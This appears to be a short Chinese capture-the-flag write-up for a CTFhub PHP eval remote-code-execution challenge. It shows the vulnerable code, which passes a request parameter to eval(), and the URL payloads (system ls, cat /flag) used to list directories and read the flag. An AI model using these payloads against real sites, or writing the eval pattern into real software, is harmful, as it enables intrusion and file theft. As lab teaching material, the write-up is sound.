CTFhub-RCE-evel执行

携柺星年2023-11-13 11:42

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
huohaiyu2 小时前
从URL到页面的完整解析流程
前端·网络·chrome·url
阿星AI工作室4 小时前
一个简单Demo彻底理解前后端怎么连的丨Figma + Supabase + Vercel
前端·人工智能
Drifter_yh4 小时前
【黑马点评】Redisson 分布式锁核心原理剖析
java·数据库·redis·分布式·spring·缓存
aircrushin4 小时前
一拍即传的平替,完全免费的实时照片墙!
前端
莫寒清6 小时前
Spring MVC:@RequestParam 注解详解
java·spring·mvc
没有医保李先生6 小时前
字节对齐的总结
java·开发语言
鹏北海6 小时前
JSBridge 原理详解
前端
孟健7 小时前
我的网站被黑了:一天灌入 227 万条垃圾数据,AI 写的代码差点让我社死
前端
anOnion7 小时前
构建无障碍组件之Checkbox pattern
前端·html·交互设计
甲枫叶8 小时前
【claude】Claude Code正式引入Git Worktree原生支持:Agent全面实现并行独立工作
java·人工智能·git·python·ai编程
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03【OpenClaw 本地实战 Ep.3】突破瓶颈:强制修改 openclaw.json 解锁 32k 上下文记忆04AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot05openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南06全面体验 Grok API 中转站(2025 · Grok 4 系列最新版)07HTML 早已不是标签了,它现在是系统级接口:这 9 个 API 直接干翻常用 JS 库08Clawdbot部署教程:解决‘gateway token missing’授权问题的完整步骤09如何解决 OpenClaw “Pairing required” 报错:两种官方解决方案详解10jdk21下载、安装(Windows、Linux、macOS)